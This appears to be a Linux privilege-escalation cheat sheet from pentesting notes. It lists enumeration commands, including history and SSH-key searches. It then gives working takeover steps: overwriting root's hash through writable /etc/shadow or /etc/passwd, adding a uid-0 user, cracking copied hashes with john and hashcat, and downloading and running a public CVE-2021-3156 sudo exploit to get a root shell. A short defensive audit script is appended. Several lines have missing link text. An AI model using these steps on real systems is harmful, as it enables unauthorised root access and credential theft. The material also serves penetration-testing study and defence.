Linux
Run , , for enumerating privilege escalation vectors!
# List available commands
compgen -c | sort | less
compgen -a | sort | less
# Help for a specified command
man <command>
<command> --help
General networking information, such as interfaces, IP addresses, and DNS:
ip addr show
ip a
ifconfig -a # deprecated
# Show interfaces
ip link show
Check the routing table and recent neighbours (the ARP table):
ip route
ip neigh
List active TCP and UDP connections:
ss -tulnp
netstat -tulnp # deprecated
List recent and persistent routes:
ip route show
ip r
route -n # legacy
# General system information
neofetch
hostnamectl
uname -a
# Name of the host
hostname
# Kernel version & distro info
uname -r
cat /etc/os-release
# Terminal history file
cat ~/.bash_history
cat ~/.zsh_history
history
# Environment variables
printenv
env
# Maximum pipe size
cat /proc/sys/fs/pipe-max-size
# Open files, including named pipes (shown as FIFO)
lsof
# sudo version
sudo --version
# Installed packages
# Debian / Ubuntu (APT-based)
dpkg -l
apt list --installed
# RedHat / CentOS / Fedora (RPM-based)
rpm -qa
dnf list installed
yum list installed
# Arch Linux / Manjaro (Pacman)
pacman -Q
# Snap packages
snap list
# Flatpak packages
flatpak list
# Homebrew (macOS or Linux)
brew list --versions
# List running processes
ps aux
# Information about a specific process
ps -p <PID> -f
cat /proc/<PID>/status
ps -eo pid,cmd
# List systemd units
systemctl
# Current user
whoami
# List current user's privileges
sudo -l
# List current user's information
id
getent passwd $(whoami)
# List local users
cut -d: -f1 /etc/passwd
getent passwd
# List active (logged-on) users
who
# Elevated permissions
sudo -l
# List current user's groups
groups
id -Gn
# List local groups
getent group
# List group members
getent group <group>
# List all files, including hidden ones
ls -la
# Include subdirectories
ls -laR
# Search for a specific file
find / -type f -name "local.txt" 2>/dev/null
locate local.txt
# Case-insensitive search
find / -type f -iname "local.txt" 2>/dev/null
# Find SUID binaries
find / -type f -perm -4000 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
Check the permissions of /etc/shadow:
ls -l /etc/shadow
If it is writable, create/modify a user:
# Generate a new password hash
openssl passwd -1 -salt xyz newpassword
# Replace root's password with the new one
echo 'root:$1$xyz$YOUR_GENERATED_HASH' | chpasswd -e
# Switch to root
su - root
If it is readable, copy shadow and passwd locally and crack them:
# Unshadow files
unshadow passwd shadow > hashes.txt
# Crack with john
john --wordlist=rockyou.txt hashes.txt
# Crack with hashcat (mode 1800 = sha512crypt; --username skips the user field that unshadow keeps)
hashcat -m 1800 --username hashes.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
Check the permissions of /etc/passwd:
ls -l /etc/passwd
If it is writable:
# Generate a new hash
openssl passwd -1 -salt evil password123
# Place the hash between the first and second ':' of root ('|' is used as the sed delimiter because the hash contains '/')
sed -i 's|^root:[^:]*:|root:$1$evil$F9LZzU/LJjH7ZQZzJX.Zn1:|' /etc/passwd
# Or append root's info to the bottom, changing 'root' to a new user (e.g. 'newroot')
echo "newroot:\$1\$evil\$F9LZzU/LJjH7ZQZzJX.Zn1:0:0:root:/root:/bin/bash" >> /etc/passwd
# Switch user
su root
su newroot
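As an added defender-side example (not part of the original page): a POSIX sh audit that flags the conditions the checks above look for, a writable /etc/passwd or /etc/shadow, a world-readable /etc/shadow, and setuid binaries that are not on an allow-list of expected ones. It runs against a constructed scratch tree so it works anywhere without root; the allow-list paths are an assumption.

```shell
#!/bin/sh
# Added audit example (not from the original page). Run audit_tree / on a real host;
# the demo below uses a constructed scratch tree so it runs anywhere without root.

# Succeed when the "others" permission bits of FILE include BIT (4 = read, 2 = write).
has_other_bit() {
    mode=$(stat -c '%a' "$1" 2>/dev/null) || return 1
    other=${mode#"${mode%?}"}            # last octal digit = others
    [ $(( other & $2 )) -ne 0 ]
}

# Print one line per finding under ROOT: writable passwd/shadow, readable shadow,
# and setuid binaries not on the (assumed) allow-list of expected ones.
audit_tree() {
    root=$1
    has_other_bit "$root/etc/passwd" 2 && echo "WRITABLE $root/etc/passwd"
    has_other_bit "$root/etc/shadow" 2 && echo "WRITABLE $root/etc/shadow"
    has_other_bit "$root/etc/shadow" 4 && echo "READABLE $root/etc/shadow"
    for f in $(find "$root" -type f -perm -4000 2>/dev/null); do
        case "$f" in
            */usr/bin/sudo|*/usr/bin/su|*/usr/bin/passwd) ;;   # expected setuid
            *) echo "SUID $f" ;;
        esac
    done
    return 0
}

# Number of findings, as a plain integer.
count_findings() {
    echo $(( $(audit_tree "$1" | wc -l) ))
}

# Constructed demo tree reproducing the misconfigurations the checks above look for.
make_demo() {
    d=$(mktemp -d)
    mkdir -p "$d/etc" "$d/usr/bin" "$d/tmp"
    printf 'root:x:0:0:root:/root:/bin/bash\n' > "$d/etc/passwd"
    chmod 666 "$d/etc/passwd"                     # world-writable: finding
    printf 'root:$6$demo$notarealhash:19000:0:99999:7:::\n' > "$d/etc/shadow"
    chmod 644 "$d/etc/shadow"                     # world-readable: finding
    : > "$d/usr/bin/passwd"; chmod 4755 "$d/usr/bin/passwd"   # expected setuid
    : > "$d/tmp/backup";     chmod 4755 "$d/tmp/backup"       # unexpected: finding
    echo "$d"
}

demo=$(make_demo)
audit_tree "$demo"
echo "findings: $(count_findings "$demo")"   # 3
rm -rf "$demo"
```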
# Search for SSH private keys
sudo find /home -name "id_rsa" -o -name "id_dsa"
# Print cron jobs
crontab -l
cat /etc/crontab
grep CRON /var/log/syslog
# Check the kernel's version
$ uname -a
Linux web01 5.4.0-128-generic #144-Ubuntu SMP Tue Sep 20 11:00:04 UTC 2022 x86_64
# Check the target's sudo version
$ sudo --version
Sudo version 1.8.31
# Download the PoC to the target
$ wget https://raw.githubusercontent.com/worawit/CVE-2021-3156/refs/heads/main/exploit_nss.py
# Assign execute permissions
$ chmod +x exploit_nss.py
# Run the exploit
$ ./exploit_nss.py
...
# id
uid=0(root) gid=0(root) groups=0(root),998(apache),1004(anita)
can be used on the target to enumerate real-time system information!
Vulnerable to ().
Vulnerable to heap-based buffer overflow ().
There is a working available: